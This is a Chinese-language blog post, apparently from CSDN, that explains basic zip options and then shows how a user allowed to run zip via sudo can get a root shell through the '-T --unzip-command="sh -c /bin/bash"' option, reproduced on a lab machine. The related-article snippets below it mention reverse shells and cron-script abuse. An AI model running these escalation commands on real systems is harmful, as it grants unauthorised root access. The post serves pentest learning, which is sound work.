使用Zip命令进行本地提权(类Unix系统)

最新推荐文章于 2024-04-20 18:59:48 发布
最新推荐文章于 2024-04-20 18:59:48 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: linux提权 文章标签: 提权 linux zip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46700042/article/details/109649363
版权

使用Zip命令进行本地提权(类Unix系统)

Zip定义:

Zip是一个简单的基于平台的文件打包和压缩实用程序,适用于类Unix系统,如Linux,Windows等。通过压缩文件和目录它可以帮助我们打包许多分发文件,归档文件和磁盘存储。

使用 Zip 命令执行的主要操作:

我们运行zip -h命令,查看帮助

zip -h

在这里插入图片描述

部分功能简介:

使用 -d 选项删除:

生成zip文件后,可以使用-d选项从存档中删除该文件;

zip -d file.zip file1.txt

使用 -u 选项更新:

要更新zip文件并将文本文件直接添加到zip文件中,我们可以使用到-u选项;

zip -u file.zip file1.txt

使用 -m 选项移动多个文件:

如果要在zip文件中移动一些不同扩展名的文件,可以使用-m选项。通过执行以下命令来移动zip文件中的所有文本文件。

zip -m 1.zip *.txt

可以通过ls -la命令检查所有文本文件是否已被移动到zip文件中;

使用 zip 执行系统命令:

其实我们可以使用zip文件来运行任何的Linux命令。首先,使用touch命令创建一个名为1.txt的文本文件。然后我们尝试通过zip命令执行Linux命令:

zip 1.zip 1.txt -T --unzip-command=“sh -c ifconfig”

在这里插入图片描述

在这里插入图片描述

可以看到,成功通过zip命令执行了系统命令!!!

利用 zip 提权 (重点)

当以更高权限运行时,zip的行为将会发生改变。

假设系统管理员已授予本地用户sudo运行zip的权限。
一旦系统被侵入则很有可能导致提权。测试用户就能以sudo用户身份以root权限来运行zip命令!!!

靶机复现:

首先,使用touch命令创建一个文件1.txt,然后通过zip文件压缩文件,并执行一个获取shell的命令。

sudo zip 1.zip 1.txt -T --unzip-command=“sh -c /bin/bash”

利用zip命令来进行提权

输入命令:

touch /tmp/tiquan
在/tmp目录下创建一个为tiquan名字的空文件;

输入命令:

sudo -u root zip /tmp/tiquan.zip /tmp/tiquan -T --unzip-command=“sh -c /bin/bash”

可以看到用户以root用户身份运行tar和zip命令:

在这里插入图片描述

可以看到,成功通过zip命令获取到受害者机器的shell!!!

参考博客:
https://www.freebuf.com/articles/system/206007.html

@小张小张
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zip.h zip库要用到
10-26
zip.h zip库要用到zip.h zip库要用到zip.h zip库要用到zip.h zip库要用到
Linux指令集】---zip指令(超详细)
m0_74352571的博客
07-15 2万+
Linux---zip指令的常用选项的介绍。
Linux命令之压缩zip
热门推荐
二木成林
05-24 19万+
`zip` 命令的功能是用于压缩文件,解压命令为 `unzip`。压缩后不覆盖源文件,可以压缩目录。
linux提权——提权大赏
最新发布
qq_55202378的博客
04-20 876
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。文件中,每个用户的密码都是用一个特定的哈希函数加密的。查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现提权;时本来就是root权限,预先加载共享库shell.so时,也是以root用户的权限去加载的。
zip.h解析
超频化石鱼的博客
02-07 2152
// 返回值 #define ZIP_OK (0) #define ZIP_EOF (0) #define ZIP_ERRNO (Z_ERRNO) #define ZIP_PARAMERROR (-102) #define
linux常用命令(1):zip/unzip命令(压缩文件/解压缩文件)
weixin_49114503的博客
09-18 7万+
本文主要讲解在Linux上怎么将文件压缩成zip包,及解压缩zip包。zip命令 可以用来解压缩文件,或者对文件进行打包操作。zip是个使用广泛的压缩程序,文件经它压缩后会另外产生具有“.zip”扩展名的压缩文件。通过 zip 命令可以将文件打包成.zip格式的压缩包,里面会附含文件的名称、路径、创建时间、上次修改时间等等信息,与 tar 命令相似。
linux使用记录(一)
weixin_34209406的博客
09-27 154
1、tar #解压tar –xvf file.tar #解压 tar包 tar -xzvf file.tar.gz #解压tar.gz tar -xjvf file.tar.bz2 #解压 tar.bz2 tar –xZvf file.tar.Z #解压tar.Z unrar e file.rar #解压rar unzip file.zip ...
Linux zip/unzip命令
每天都要开心呀(#^.^#)
10-09 1478
zip 命令的功能是用于压缩文件,解压命令为 unzip。压缩后不覆盖源文件,可以压缩目录。
Linuxzip命令
m0_57719465的博客
07-17 1万+
表示将文件压缩并加入压缩文件后,删除原始文件(zip-rmtest5.ziptest5对文件压缩后删除需要加-rm);表示查看压缩内的文件(zipinfo-1test2.zip效果一样);表示删除压缩文件内指定的文件(或者当压缩是目录时,指定目录下的文件);递归处理,将指定目录下的所有文件和子目录一并处理;表示将指定目录下的所有文件和子目录一并处理;将文件压缩并加入压缩文件后,删除原始文件;压缩一个名为test.zip的文件;删除压缩文件内指定的文件;指定存放文件的目录;...
Linuxzip 命令
长行
02-06 5004
zip
zip和unzip压缩解压指令 --排除目录
kwame211的博客
07-15 2万+
zip参数:-r 递归压缩,将指定目录下的所有文件以及子目录全部压缩-d 从压缩文件内删除指定的文件-i “文件列表” 只压缩文件列表中的文件-x “文件列表” 压缩时排除文件列表中指定的文件-u 更新文件到压缩文件中-m 将文件加入压缩文件压缩后,删除原始文件,即把文件移到压缩文件中-F 尝试修复损坏的压缩文件-T 检查压缩文件内的每个文件是否正确无误- 压缩级别 压缩级别是一个1~9的数字举例...
vulnhub渗透系列之zico2(内含zip提权和脏牛提权
来到了学渣的博客
02-02 2160
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种提权的方法(python反shell和zip提权、php反shell和 脏牛提权)并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
zip.h 无法打开源文件_如何打开Windows无法处理的巨大Zip文件?
cuma1988的博客
09-21 705
zip.h 无法打开源文件Most of the time unzipping a zip file in Windows is straightforward, but once in a while a zip file comes along and is nothing but trouble. With that in mind, today’s SuperUser Q&A po...
linux zip 提权
YouthBelief的博客
12-27 648
前言 如果系统管理员赋予本地用户使用sudo 运行zip的权限。 入侵者就可以通过sudo以root权限来运行zip命令。 如 下 复现 (2)用zip执行命令 touch 1.txt sudo zip 1.zip 1.txt -T --unzip-command="sh -c ifconfig" 执行成功 (3)提权 sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash" 提权成功 ...
7-Zip提权漏洞相关
weixin_51194266的博客
06-21 1280
2022年4月份7-zip漏洞的简单复现以及查到的瓜 说实话瓜的部分多一点(
Linux下的压缩(zip)解压(unzip)缩命令
栗少的博客
10-20 1万+
1.zip命令 zip -r myfile.zip ./* 将当前目录下的所有文件和文件夹全部压缩成myfile.zip文件,-r表示递归压缩子目录下所有文件. 2.unzip命令 unzip -o -d /home/sunny myfile.zip 把myfile.zip文件解压到 /home/sunny/ -o:不提示的情况下覆盖文件; -d:-d /home/sunny 指明将文件解压缩到/home/sunny目录下; 3.其他 zip -d myfile.zip smart.txt 删除压缩文件中s
Linux常用命令一一压缩与解压缩
chen1415886044的博客
09-28 823
tar tar是Linux中最常见的解压缩命令。tar命令可以用于处理后缀名为tar、tar.gz、tar.bz2等文件。 命令行参数属性说明: -c 建立新的压缩文件 -r 添加文件到已经压缩的文件 -u 添加改变了和现有的文件到已经存在的压缩文件 -x 从压缩的文件中提取文件 -t 显示压缩文件的内容 -z 支持gzip解压文件 -j 支持bzip2解压文件 -v 显示操作过程 -k 保留源有...
Linux zip命令教程:详解文件压缩和解压缩(附实例详解和注意事项)
u012964600的博客
01-10 1万+
Zip命令Linux使用,用于压缩和打包文件。此命令可提取ZIP存档中的文件,并更新或删除ZIP 存档中的文件。它支持不同的压缩方法、级别和加密选项。您还可以创建分割的Zip文件和密码保护的ZIP文件。
Linux命令行三:压缩 zip / 解压缩 unzip 命令
天将降大任于是人
11-10 3886
zip 命令通过zip命令可以将目录或者文件压缩成扩展名为“.zip”的压缩文件。 语法:zip [-options] [-b path] [-t mmddyyyy] [-n suffixes] [zipfile list] [-xi list]参数: -f 仅将源目录下的发生变更的文件压缩到zip文件中,源目录下新增的文件不进行压缩。 -u 与-f参数似,但是除了更新的文件外,也

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值